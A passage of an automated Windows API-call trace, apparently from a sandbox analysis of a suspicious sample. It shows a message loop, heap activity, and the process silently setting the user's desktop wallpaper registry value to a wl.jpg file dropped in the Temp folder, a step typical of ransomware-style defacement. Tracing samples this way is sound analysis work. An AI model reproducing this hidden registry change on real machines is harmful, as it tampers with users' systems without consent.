| out: lpMsg=0x8cf798) returned 1 [0273.014] TranslateMessage (lpMsg=0x8cf798) returned 0 [0273.014] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0273.014] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0273.014] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0273.015] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.015] Sleep (dwMilliseconds=0xa) [0273.066] timeGetTime () returned 0x1184750 [0273.066] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.066] Sleep (dwMilliseconds=0xa) [0273.154] timeGetTime () returned 0x11847a7 [0273.154] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.155] Sleep (dwMilliseconds=0xa) [0273.176] timeGetTime () returned 0x11847be [0273.176] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.177] Sleep (dwMilliseconds=0xa) [0273.193] timeGetTime () returned 0x11847cf [0273.194] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.194] Sleep (dwMilliseconds=0xa) [0273.259] timeGetTime () returned 0x1184810 [0273.259] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.259] Sleep (dwMilliseconds=0xa) [0273.275] timeGetTime () returned 0x118481f [0273.275] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.275] Sleep (dwMilliseconds=0xa) [0273.294] timeGetTime () returned 0x1184833 [0273.294] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.294] Sleep (dwMilliseconds=0xa) [0273.316] timeGetTime () returned 0x1184848 [0273.316] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.316] Sleep (dwMilliseconds=0xa) [0273.330] timeGetTime () returned 0x1184856 [0273.330] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.330] Sleep (dwMilliseconds=0xa) [0273.353] timeGetTime () returned 0x118486d [0273.353] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.353] Sleep (dwMilliseconds=0xa) [0273.485] timeGetTime () returned 0x11848f3 [0273.485] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.486] Sleep (dwMilliseconds=0xa) [0273.537] timeGetTime () returned 0x1184926 [0273.537] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.537] Sleep (dwMilliseconds=0xa) [0273.555] timeGetTime () returned 0x1184937 [0273.555] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.555] Sleep (dwMilliseconds=0xa) [0273.581] timeGetTime () returned 0x1184952 [0273.581] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.581] Sleep (dwMilliseconds=0xa) [0273.595] timeGetTime () returned 0x118495f [0273.595] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.595] Sleep (dwMilliseconds=0xa) [0273.646] timeGetTime () returned 0x1184993 [0273.646] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0273.646] Sleep (dwMilliseconds=0xa) [0273.704] timeGetTime () returned 0x11849cd [0273.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0273.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0273.704] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0273.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0273.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0273.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0273.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0273.705] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0273.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0273.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0273.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0273.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0273.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0273.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0273.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0273.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0273.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0273.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0273.706] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0273.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0273.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0273.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0273.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0273.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0273.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0273.707] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0273.707] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0273.711] RegCloseKey (hKey=0x2d0) returned 0x0 [0273.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0273.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0273.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0273.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0273.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0273.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0273.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0273.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0273.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0273.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0273.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0273.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0273.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0273.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0273.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0273.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0273.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0273.712] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0273.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0273.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0273.713] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0273.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0273.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0273.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0273.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0273.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0273.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0273.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0273.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0273.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0273.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0273.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0273.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0273.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0273.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0273.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0273.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0273.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0273.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0273.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0273.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0273.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0273.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0273.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0273.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0273.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0273.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0273.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0273.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0273.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0273.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0273.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0273.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0273.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0273.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0273.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0273.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0273.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0273.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0273.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0273.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0273.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0273.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0273.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0273.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0273.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0273.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0273.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0273.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0273.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0273.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0273.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0273.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0273.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0273.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0273.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0273.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0273.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0273.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0273.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0273.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0273.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0273.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0273.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0273.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0273.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0273.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0273.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0273.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0273.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0273.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0273.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0273.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0273.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0273.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0273.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0273.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0273.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0273.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0273.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0273.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0273.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0273.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0273.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0273.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0273.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0273.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0273.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0273.720] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0273.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0273.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0273.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0273.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0273.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0273.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0273.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0273.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0273.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0273.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0273.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0273.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 